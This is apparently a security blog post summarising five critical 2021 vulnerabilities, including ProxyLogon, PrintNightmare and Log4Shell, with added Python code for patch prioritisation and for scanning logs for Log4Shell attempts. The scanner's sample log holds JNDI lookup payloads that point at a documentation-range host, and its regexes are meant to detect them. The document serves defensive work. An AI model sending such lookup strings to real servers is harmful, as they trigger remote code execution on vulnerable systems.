Vulnerability management is a marathon, not a sprint. No matter how hard you try, you cannot patch every vulnerability. Prioritization based on value to the business and exposure to attack is critical for efficient remediation and mitigation.
Threat actors often look for easy targets on internet-facing servers with a high chance of successful exploitation, regardless of the vulnerability’s severity ranking.
Following is a curated list of critical vulnerabilities reported in 2021, which were at the top of every security professional’s prioritized patch list.
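As an added example (not code from the original post), the following Python script ranks findings the way the introduction argues: base severity is only one input, and the asset’s exposure to attack and its value to the business decide the order. The weights, the asset inventory and the placeholder id CVE-0000-0000 are constructed for illustration; the two CVSS scores used (9.1 for CVE-2021-22937 and 10 for CVE-2021-44228) are the ones stated in the entries below.

```python
"""Exposure-aware patch prioritization.

Added example, not code from the original post. Ranks vulnerability findings by
combining base severity with the two factors the introduction calls out: the
asset's value to the business and its exposure to attack (internet facing,
known exploitation in the wild). Weights and the asset inventory are constructed.
"""
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class Finding:
    cve: str
    asset: str
    cvss: float              # published base score, 0.0 - 10.0
    internet_facing: bool    # reachable from the public internet
    exploited_in_wild: bool  # credible reports of active exploitation
    business_value: int      # owner-assigned, 1 (low) .. 5 (critical)


# Weights (constructed): severity can contribute at most 40 of 100 points, so an
# exploited, internet-facing bug on a critical asset can outrank a higher-CVSS
# bug on an isolated, low-value host.
W_SEVERITY, W_INTERNET, W_EXPLOITED, W_VALUE = 40.0, 25.0, 20.0, 15.0


def priority_score(f: Finding) -> float:
    """Return a 0..100 score; higher means patch sooner."""
    if not 0.0 <= f.cvss <= 10.0 or not 1 <= f.business_value <= 5:
        raise ValueError(f"out-of-range input for {f.cve} on {f.asset}")
    severity = f.cvss / 10.0 * W_SEVERITY
    exposure = (W_INTERNET if f.internet_facing else 0.0) + \
               (W_EXPLOITED if f.exploited_in_wild else 0.0)
    value = (f.business_value - 1) / 4.0 * W_VALUE
    return severity + exposure + value


def rank(findings: List[Finding]) -> List[Finding]:
    """Highest score first; ties broken by CVSS so the output is deterministic."""
    return sorted(findings, key=lambda f: (priority_score(f), f.cvss), reverse=True)


# Constructed inventory. CVSS 9.1 and 10.0 are the scores the post gives for the
# Pulse Connect Secure and Log4Shell entries; CVE-0000-0000 is a placeholder id
# standing in for a medium-severity bug with no published score here.
SAMPLE_FINDINGS = [
    Finding("CVE-2021-44228", "build-server-internal", 10.0, False, True, 2),
    Finding("CVE-2021-22937", "vpn-gateway", 9.1, True, True, 5),
    Finding("CVE-0000-0000", "customer-portal", 6.5, True, True, 5),
]

if __name__ == "__main__":
    for f in rank(SAMPLE_FINDINGS):
        print(f"{priority_score(f):6.1f}  {f.cve:15}  {f.asset}")
```

Run as a script, the CVSS 10 finding on the isolated build server comes out last, behind the medium-severity bug on the exposed, high-value portal; that is exactly the ordering a severity-only patch list would get wrong.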
1) ProxyLogon: CVE-2021-26855
ProxyLogon is a pre-authentication proxy vulnerability that allows a remote actor to bypass authentication and obtain administrator privileges on Microsoft Exchange Servers.
When chained with a post-authentication vulnerability that allows arbitrary file writes to the system (CVE-2021-27065, discovered three weeks later), an actor can achieve remote execution of arbitrary commands through internet-exposed Exchange Servers.
Initial access was gained by uploading a web shell, commonly referred to as “China Chopper.” The vulnerability was actively exploited in the wild by HAFNIUM, a suspected state-sponsored APT group operating out of China. ProxyLogon was found by a researcher working for the Taiwanese security consulting organization DEVCORE.
2) PrintNightmare: CVE-2021-1675 | CVE-2021-34527
Microsoft addressed a local privilege escalation (LPE) vulnerability (CVE-2021-1675) in the Windows Print Spooler service in the June 2021 Patch Tuesday release. A few days later, researchers found that even with the security update deployed, the Spooler service could still be exploited for remote code execution (RCE), tracked as CVE-2021-34527, with the code running under SYSTEM privileges.
An attacker who successfully exploited PrintNightmare could run arbitrary code with SYSTEM privileges and then install programs; view, change, or delete data; or create new accounts with full user rights. Microsoft released an unusual out-of-band patch to address PrintNightmare’s RCE vulnerability.
Yet researchers showed that the patch does not completely fix the PrintNightmare RCE vulnerability in specific scenarios. CISA strongly recommended that administrators disable the Print Spooler service on Domain Controllers and other critical systems that do not require printing, as suggested by Microsoft’s how-to guide.
3) PetitPotam: CVE-2021-36942
PetitPotam, tracked as CVE-2021-36942, is a vulnerability that can help an attacker take complete control of a Windows domain.
PetitPotam abuses the Encrypting File System Remote (MS-EFSRPC) protocol, which is designed for performing maintenance and management operations on encrypted data stored remotely and accessed over a network. An unauthenticated attacker can use PetitPotam to coerce a targeted server into connecting to the attacker’s server and performing NTLM authentication.
PetitPotam can be chained with an exploit targeting Active Directory Certificate Services (AD CS), which provides public key infrastructure (PKI) functionality. PetitPotam was actively exploited in malicious attacks, including some aimed at deploying a ransomware strain named LockFile.
4) PulseSecure: CVE-2021-22937
CVE-2021-22937 is an uncontrolled archive extraction vulnerability that allows an authenticated administrator to write arbitrary executable files to the “/home/runtime/tmp/tt/” directory in the Pulse Connect Secure appliance.
It received a CVSSv3 score of 9.1. This unrestricted file upload vulnerability is due to a flaw in how archive files are extracted in the administrator web interface. Successful exploitation could result in remote code execution on the underlying operating system with root privileges. The vulnerability is a patch bypass for CVE-2020-8260, which was addressed in October 2020, and it has been actively targeted by attackers.
5) Log4Shell: CVE-2021-44228
Log4Shell is a zero-day arbitrary code execution (ACE) vulnerability in Log4j, a widely used Java logging framework. Remarkably, the flaw had been present since 2013 without being noticed. It was privately disclosed to the Apache Software Foundation by Alibaba’s Cloud Security Team on 24 November 2021 and publicly announced on 9 December 2021.
Apache gave Log4Shell a CVSS severity rating of 10, the highest available score. The widespread exploit is estimated to affect innumerable devices. Because the vulnerable code makes requests to arbitrary LDAP and JNDI servers without checking the responses, attackers can execute arbitrary Java code on a server or other computer, or leak sensitive information.
The Apache Security Team has published a list of its affected software projects. Affected commercial services include Amazon Web Services, Cloudflare, iCloud, Minecraft: Java Edition, Steam, Tencent QQ, and many others.
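The mechanism described above (a logged string containing a JNDI lookup makes the vulnerable logger contact an attacker-named LDAP/JNDI server) gives defenders a simple after-the-fact check: scan logged request fields for lookup strings. The following Python scanner is an added example, not code from the original post or from the Log4j project; the access-log lines are constructed, using documentation IP ranges, and the detection is a heuristic rather than a complete signature.

```python
"""Heuristic detection of JNDI lookup strings in request logs.

Added example, not code from the original post. Log4Shell is triggered when
attacker-controlled text containing a Log4j lookup of the form ${jndi:...}
reaches a vulnerable logger, which then contacts the named LDAP/JNDI server.
Scanning logged request fields for such lookups is a cheap way to spot
exploitation attempts after the fact. The sample lines are constructed.
"""
import re
from typing import Dict, List

# Any lookup whose name is "jndi", case-insensitive, with optional whitespace.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# A lookup nested inside another lookup. Ordinary request data has no reason to
# contain this, so treat it as suspicious even when "jndi" is not visible.
NESTED_LOOKUP = re.compile(r"\$\{[^{}]*\$\{")


def classify_line(line: str) -> str:
    """Return 'jndi-lookup', 'nested-lookup' or 'clean' for one log line."""
    if JNDI_LOOKUP.search(line):
        return "jndi-lookup"
    if NESTED_LOOKUP.search(line):
        return "nested-lookup"
    return "clean"


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Return one record per suspicious line (1-based line numbers)."""
    hits: List[Dict[str, object]] = []
    for no, line in enumerate(lines, start=1):
        verdict = classify_line(line)
        if verdict != "clean":
            hits.append({"line_no": no, "verdict": verdict, "text": line})
    return hits


# Constructed web-server access log. 198.51.100.0/24 and 203.0.113.0/24 are
# documentation ranges; the User-Agent field is where the lookups appear.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:08:01:12 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:08:01:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7/a}"',
    '203.0.113.9 - - [10/Dec/2021:08:01:14 +0000] "GET /docs?path=${HOME}/readme HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.7 - - [10/Dec/2021:08:01:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NAME}}"',
    '198.51.100.7 - - [10/Dec/2021:08:01:16 +0000] "GET / HTTP/1.1" 200 512 "-" "${ JNDI :rmi://198.51.100.7/b}"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"line {hit['line_no']}: {hit['verdict']}")
```

The third sample line shows why the nested-lookup rule is kept separate from the JNDI rule: a lone `${HOME}` in a query string is ordinary noise and stays clean, while a lookup wrapped inside another lookup is reported even though the word jndi never appears. In practice you would feed the scanner every field that an application logs from untrusted input (headers, paths, form values), not only the User-Agent.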